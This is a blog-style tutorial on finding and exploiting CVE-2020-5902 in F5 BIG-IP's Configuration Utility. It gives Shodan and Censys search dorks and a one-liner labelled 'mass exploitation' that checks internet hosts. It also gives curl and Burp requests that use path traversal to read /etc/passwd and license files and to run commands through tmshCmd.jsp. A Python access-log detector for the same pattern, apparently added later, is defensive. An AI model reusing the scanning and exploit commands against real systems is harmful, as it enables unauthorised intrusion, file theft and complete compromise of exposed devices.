How to Find and Exploit CVE-2020-5902

Introduction to CVE-2020-5902


CVE-2020-5902 is a critical vulnerability in the BIG-IP Traffic Management User Interface (TMUI), also known as the Configuration Utility. It received a CVSSv3 score of 10.0, the highest possible rating. Exploitation of this flaw grants an attacker a variety of privileges, including the ability to execute arbitrary system commands, create or delete files, and disable services on the vulnerable host. The advisory states that the vulnerability could also “result in complete system compromise.”

In simple words, CVE-2020-5902 allows an unauthenticated user to run commands and completely compromise the system, including interception of controller application traffic.

The vulnerability can be exploited remotely, and more than 8,000 vulnerable F5 BIG-IP devices are exposed on the internet and easily reachable.


How to find CVE-2020-5902 vulnerable servers?


The answer is very simple: "Just dork it."

Shodan and Censys give the best results.


Using Shodan dorks to find CVE-2020-5902 vulnerable servers

http.title:"BIG-IP®- Redirect"
http.favicon.hash:-335242539
WWW-Authenticate: Basic realm=BIG-IP

You can download and explore all Shodan search results with the Shodan CLI using the commands below:

shodan download BIG-IP 'http.title:"BIG-IP®- Redirect"'
shodan parse --fields ip_str,port BIG-IP.json.gz

If you have Shodan credits, you can automate this whole process with the script below and move straight to exploitation instead of searching for vulnerable targets.

Shodan script for mass exploitation

shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host; do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui..." | grep -q root && printf "$host \033[0;31mVulnerable\033[0m\n" || printf "$host \033[0;32mNot Vulnerable\033[0m\n"; done

Using Censys dorks to find CVE-2020-5902 vulnerable servers

443.https.get.title:"BIG-IP®- Redirect"
"BIG-IP®- Redirect"
<YOUR TARGET> "BIG-IP&reg;- Redirect"

Found vulnerable targets? Now it's time to exploit CVE-2020-5902.


How to exploit CVE-2020-5902?


To exploit CVE-2020-5902, an attacker sends a specially crafted HTTP request to the server hosting the TMUI utility for BIG-IP configuration. Let's do the same in simple steps.


Step 1 - Open the IP of the vulnerable target in the browser; a login page will come up.

Step 2 - Refresh the page, capture the request in Burp and replace the URL path with

/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

and you will get the /etc/passwd file in the response.

Also try /config/bigip.license and /etc/hosts in the fileName parameter.


You can do the same from the CLI with curl using the command below.

curl -v -k 'http://host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

This will print the result in the CLI.

Wait! Wait! Wait!


You can achieve RCE with CVE-2020-5902 using the command below.

curl -v -k 'http://<TARGET IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami'

Also try

curl -v -k 'http://<TARGET IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
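From the defender's side, the requests above leave a distinctive trace: a "..;" path segment that steps from /tmui/login.jsp into TMUI JSP endpoints such as fileRead.jsp and tmshCmd.jsp. The following Python is an added example (not part of the original post) that flags that pattern in access logs; the log lines are constructed, and the Common Log Format layout is an assumption.

```python
"""Flag CVE-2020-5902 exploitation attempts in web-server access logs (added example)."""
import re
from typing import List, Optional
from urllib.parse import unquote

# Assumed Common Log Format: client ident user [time] "METHOD PATH PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# TMUI endpoints reached through the traversal in the published requests
SENSITIVE_JSP = ("fileread.jsp", "tmshcmd.jsp")


def classify_request(path: str) -> Optional[str]:
    """Return a finding label for a request path, or None if it is not an attempt."""
    # Decode twice so percent-encoded variants normalize to the same text
    target = unquote(unquote(path)).lower().split("?", 1)[0]
    if "/tmui/" not in target or "..;" not in target:
        # A plain /tmui/ request (even to fileRead.jsp) is normal authenticated use
        return None
    for jsp in SENSITIVE_JSP:
        if jsp in target:
            return f"cve-2020-5902 traversal to {jsp}"
    return "cve-2020-5902 traversal (..; in TMUI path)"


def scan_access_log(lines: List[str]) -> List[dict]:
    """Parse each log line and collect the requests that match the exploit pattern."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        label = classify_request(m["path"])
        if label:
            findings.append({"ip": m["ip"], "time": m["time"], "path": m["path"],
                             "status": int(m["status"]), "label": label})
    return findings


# Constructed sample log: one normal login, two exploitation attempts, one
# legitimate authenticated use of fileRead.jsp without the traversal.
SAMPLE_LOG = """\
203.0.113.10 - - [06/Jul/2020:10:12:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 3154
203.0.113.10 - - [06/Jul/2020:10:12:09 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1417
203.0.113.10 - - [06/Jul/2020:10:12:15 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 200 512
198.51.100.7 - - [06/Jul/2020:10:13:30 +0000] "GET /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts HTTP/1.1" 200 240
"""

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['ip']} {f['status']} {f['label']}: {f['path']}")
```

A 200 status on a flagged line means the traversal succeeded and the host should be treated as compromised, not merely probed.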

-----------------------------------------------THE END--------------------------------------------------

Command Source: Devcentral

